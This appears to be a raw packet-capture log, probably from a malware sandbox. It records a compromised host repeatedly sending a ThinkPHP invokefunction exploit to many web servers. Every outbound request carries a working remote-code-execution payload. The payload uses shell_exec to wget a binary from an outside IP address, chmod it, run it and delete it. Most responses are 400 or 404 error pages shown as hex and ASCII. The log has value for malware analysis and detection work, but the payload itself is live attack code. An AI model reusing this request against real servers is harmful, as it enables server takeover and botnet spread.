Nov 22, 2023 08:38:48.256576061 CET	7062	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:48.563030958 CET	7091	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:34:11 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
351	192.168.2.23	41498	112.196.16.137	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:48.314603090 CET	7062	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
352	192.168.2.23	59214	112.28.221.212	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:48.314824104 CET	7063	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:48.677753925 CET	7104	IN	HTTP/1.1 400 Bad Request Server: Tengine Date: Wed, 22 Nov 2023 07:38:48 GMT Content-Type: text/html Content-Length: 809 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 20 53 6f 72 72 79 20 66 6f 72 20 74 68 65 20 69 6e 63 6f 6e 76 65 6e 69 65 6e 63 65 2e 3c 62 72 2f 3e 0d 0a 50 6c 65 61 73 65 20 72 65 70 6f 72 74 20 74 68 69 73 20 6d 65 73 73 61 67 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 74 6f 20 75 73 2e 3c 62 72 2f 3e 0d 0a 54 68 61 6e 6b 20 79 6f 75 20 76 65 72 79 20 6d 75 63 68 21 3c 2f 70 3e 0d 0a 3c 74 61 62 6c 65 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 55 52 4c 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 68 74 74 70 3a 2f 2f 2f 69 6e 64 65 78 2e 70 68 70 3f 73 3d 2f 69 6e 64 65 78 2f 09 68 69 6e 6b 07 70 70 2f 69 6e 76 6f 6b 65 66 75 6e 63 74 69 6f 6e 26 61 6d 70 3b 66 75 6e 63 74 69 6f 6e 3d 63 61 6c 6c 5f 75 73 65 72 5f 66 75 6e 63 5f 61 72 72 61 79 26 61 6d 70 3b 76 61 72 73 5b 30 5d 3d 73 68 65 6c 6c 5f 65 78 65 63 26 61 6d 70 3b 76 61 72 73 5b 31 5d 5b 5d 3d 27 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 62 69 6e 73 2f 78 38 36 20 2d 4f 20 74 68 6f 6e 6b 70 68 70 20 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 68 6f 6e 6b 70 68 70 20 3b 20 2e 2f 74 68 6f 6e 6b 70 68 70 20 54 68 69 6e 6b 50 48 50 20 3b 20 72 6d 20 2d 72 66 20 74 68 69 6e 6b 70 68 70 27 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 53 65 72 76 65 72 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 6d 65 72 67 65 36 2e 6c 32 63 6e 33 31 32 32 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 44 61 74 65 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 32 30 32 33 2f 31 31 2f 32 32 20 31 35 3a 33 38 3a 34 38 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 2f 74 61 62 6c 65 3e 0d 0a 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body bgcolor="white"><h1>400 Bad Request</h1><p>Your browser sent a request that this server could not understand. Sorry for the inconvenience.<br/>Please report this message and include the following information to us.<br/>Thank you very much!</p><table><tr><td>URL:</td><td>http:///index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'</td></tr><tr><td>Server:</td><td>merge6.l2cn3122</td></tr><tr><td>Date:</td><td>2023/11/22 15:38:48</td></tr></table><hr/>Powered by Tengine</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
353	192.168.2.23	59218	112.28.221.212	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:48.609657049 CET	7097	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:48.985208035 CET	7109	IN	HTTP/1.1 400 Bad Request Server: Tengine Date: Wed, 22 Nov 2023 07:38:48 GMT Content-Type: text/html Content-Length: 809 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 20 53 6f 72 72 79 20 66 6f 72 20 74 68 65 20 69 6e 63 6f 6e 76 65 6e 69 65 6e 63 65 2e 3c 62 72 2f 3e 0d 0a 50 6c 65 61 73 65 20 72 65 70 6f 72 74 20 74 68 69 73 20 6d 65 73 73 61 67 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 74 6f 20 75 73 2e 3c 62 72 2f 3e 0d 0a 54 68 61 6e 6b 20 79 6f 75 20 76 65 72 79 20 6d 75 63 68 21 3c 2f 70 3e 0d 0a 3c 74 61 62 6c 65 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 55 52 4c 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 68 74 74 70 3a 2f 2f 2f 69 6e 64 65 78 2e 70 68 70 3f 73 3d 2f 69 6e 64 65 78 2f 09 68 69 6e 6b 07 70 70 2f 69 6e 76 6f 6b 65 66 75 6e 63 74 69 6f 6e 26 61 6d 70 3b 66 75 6e 63 74 69 6f 6e 3d 63 61 6c 6c 5f 75 73 65 72 5f 66 75 6e 63 5f 61 72 72 61 79 26 61 6d 70 3b 76 61 72 73 5b 30 5d 3d 73 68 65 6c 6c 5f 65 78 65 63 26 61 6d 70 3b 76 61 72 73 5b 31 5d 5b 5d 3d 27 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 62 69 6e 73 2f 78 38 36 20 2d 4f 20 74 68 6f 6e 6b 70 68 70 20 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 68 6f 6e 6b 70 68 70 20 3b 20 2e 2f 74 68 6f 6e 6b 70 68 70 20 54 68 69 6e 6b 50 48 50 20 3b 20 72 6d 20 2d 72 66 20 74 68 69 6e 6b 70 68 70 27 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 53 65 72 76 65 72 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 6d 65 72 67 65 36 2e 6c 32 63 6e 33 31 32 32 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 44 61 74 65 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 32 30 32 33 2f 31 31 2f 32 32 20 31 35 3a 33 38 3a 34 38 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 2f 74 61 62 6c 65 3e 0d 0a 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body bgcolor="white"><h1>400 Bad Request</h1><p>Your browser sent a request that this server could not understand. Sorry for the inconvenience.<br/>Please report this message and include the following information to us.<br/>Thank you very much!</p><table><tr><td>URL:</td><td>http:///index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'</td></tr><tr><td>Server:</td><td>merge6.l2cn3122</td></tr><tr><td>Date:</td><td>2023/11/22 15:38:48</td></tr></table><hr/>Powered by Tengine</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
354	192.168.2.23	40434	112.222.225.23	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:48.860353947 CET	7107	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:49.160115004 CET	7174	IN	HTTP/1.1 404 Not Found Date: Wed, 22 Nov 2023 07:38:48 GMT Server: Apache/2.2.2 (Unix) mod_ssl/2.2.2 OpenSSL/0.9.8i DAV/2 PHP/5.2.0 Content-Length: 207 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 X-Pad: avoid browser bug Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
355	192.168.2.23	51294	112.65.217.62	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:49.044122934 CET	7110	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:49.484472990 CET	7278	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:38:49 GMT Content-Type: text/html; charset=utf-8 Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
356	192.168.2.23	47026	112.48.136.107	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:49.077903032 CET	7111	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:49.463242054 CET	7274	IN	Data Raw: 2f 78 38 36 20 2d 4f 20 74 68 6f 6e 6b 70 68 70 20 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 68 6f 6e 6b 70 68 70 20 3b 20 2e 2f 74 68 6f 6e 6b 70 68 70 20 54 68 69 6e 6b 50 48 50 20 3b 20 72 6d 20 2d 72 66 20 74 68 69 6e 6b 70 68 70 27 0a 09 09 09 Data Ascii: /x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'<br>Request-Id: 655db009_PS-XMN-01QxF36_18986-65338<br><br>Check:<span class="C G" onclick="s(0)">Details</span></p></div><div id="d" class
Nov 22, 2023 08:38:49.463254929 CET	7275	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:38:49 GMT Content-Type: text/html Content-Length: 2830 Connection: close x-ws-request-id: 655db009_PS-XMN-01QxF36_18986-65338 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 35 25 20 61 75 74 6f 20 30 20 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 20 31 38 70 78 7d 2e 50 7b 6d 61 72 67 69 6e 3a 30 20 32 32 25 7d 2e 4f 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 7d 2e 4e 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 2e 4d 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 33 30 70 78 20 30 7d 2e 4c 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 36 30 70 78 7d 2e 4b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 35 70 78 3b 63 6f 6c 6f 72 3a 23 46 39 30 7d 2e 4a 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 7d 2e 49 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 30 70 78 7d 2e 48 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 7d 2e 47 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 46 7b 77 69 64 74 68 3a 32 33 30 70 78 3b 66 6c 6f 61 74 3a 6c 65 66 74 7d 2e 45 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 7d 2e 44 7b 6d 61 72 67 69 6e 3a 38 70 78 20 30 20 30 20 2d 32 30 70 78 7d 2e 43 7b 63 6f 6c 6f 72 3a 23 33 43 46 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 42 7b 63 6f 6c 6f 72 3a 23 39 30 39 30 39 30 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 35 70 78 7d 2e 41 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 7d 2e 68 69 64 65 5f 6d 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 3c 2f 73 74 79 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 70 22 20 63 6c 61 73 73 3d 22 50 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4b 22 3e 34 30 30 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 4f 20 49 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 64 69 76 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 4a 20 41 20 4c 22 3e 45 72 72 6f 72 20 54 69 6d 65 73 3a 20 57 65 64 2c 20 32 32 20 4e 6f 76 20 32 30 32 33 20 30 37 3a 33 38 3a 34 39 20 47 4d 54 0a 09 09 09 09 3c 62 72 3e 0a 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 46 22 3e 49 50 3a 20 38 39 2e 31 34 39 2e 31 38 2e 36 30 3c 2f 73 70 61 6e 3e 4e 6f 64 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 3a 20 50 53 2d 58 4d 4e 2d 30 31 51 78 46 33 36 0a 09 09 09 09 3c 62 72 3e 55 52 4c 3a 20 68 74 74 70 3a 2f 2f 2f 69 6e 64 65 78 2e 70 68 70 3f 73 3d 2f 69 6e 64 65 78 2f 09 68 69 6e 6b 07 70 70 2f 69 6e 76 6f 6b 65 66 75 6e 63 74 69 6f 6e 26 61 6d 70 3b 66 75 6e 63 74 69 6f 6e 3d 63 61 6c 6c 5f 75 73 65 72 5f 66 75 6e 63 5f 61 72 72 61 79 26 61 6d 70 3b 76 61 72 73 5b 30 5d 3d 73 68 65 6c 6c 5f 65 78 65 63 26 61 6d 70 3b 76 61 72 73 5b 31 5d 5b 5d 3d 27 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 62 69 6e 73 Data Ascii: <!DOCTYPE html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>400 Bad Request</title><style type="text/css">body{margin:5% auto 0 auto;padding:0 18px}.P{margin:0 22%}.O{margin-top:20px}.N{margin-top:10px}.M{margin:10px 0 30px 0}.L{margin-bottom:60px}.K{font-size:25px;color:#F90}.J{font-size:14px}.I{font-size:20px}.H{font-size:18px}.G{font-size:16px}.F{width:230px;float:left}.E{margin-top:5px}.D{margin:8px 0 0 -20px}.C{color:#3CF;cursor:pointer}.B{color:#909090;margin-top:15px}.A{line-height:30px}.hide_me{display:none}</style></head><body><div id="p" class="P"><div class="K">400</div><div class="O I">Bad Request</div><p class="J A L">Error Times: Wed, 22 Nov 2023 07:38:49 GMT<br><span class="F">IP: 89.149.18.60</span>Node information: PS-XMN-01QxF36<br>URL: http:///index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins
Nov 22, 2023 08:38:49.463265896 CET	7275	IN	Data Raw: 54 20 72 65 71 75 65 73 74 73 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 44 22 3e 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 69 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e Data Ascii: T requests</li><li class="D">Illegal character in hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">
Nov 22, 2023 08:38:49.567507982 CET	7284	IN	Data Raw: 54 20 72 65 71 75 65 73 74 73 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 44 22 3e 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 69 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e Data Ascii: T requests</li><li class="D">Illegal character in hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">
Nov 22, 2023 08:38:49.768486023 CET	7306	IN	Data Raw: 54 20 72 65 71 75 65 73 74 73 3c 2f 6c 69 3e 0a 09 09 09 09 09 3c 6c 69 20 63 6c 61 73 73 3d 22 44 22 3e 49 6c 6c 65 67 61 6c 20 63 68 61 72 61 63 74 65 72 20 69 6e 20 68 6f 73 74 6e 61 6d 65 3b 75 6e 64 65 72 73 63 6f 72 65 73 20 61 72 65 20 6e Data Ascii: T requests</li><li class="D">Illegal character in hostname;underscores are not allowed</li><li class="D">Range Invalid</li></ul></div><a class="N C" href="#" onclick="s(1)">return</a></div><script type="text/javascript">

Session ID	Source IP	Source Port	Destination IP	Destination Port
357	192.168.2.23	58890	112.46.50.151	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:49.083360910 CET	7112	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
358	192.168.2.23	55232	112.12.26.234	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:49.093467951 CET	7112	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:49.494339943 CET	7279	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:38:49 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
359	192.168.2.23	47028	112.48.136.107	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:49.217606068 CET	7175	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
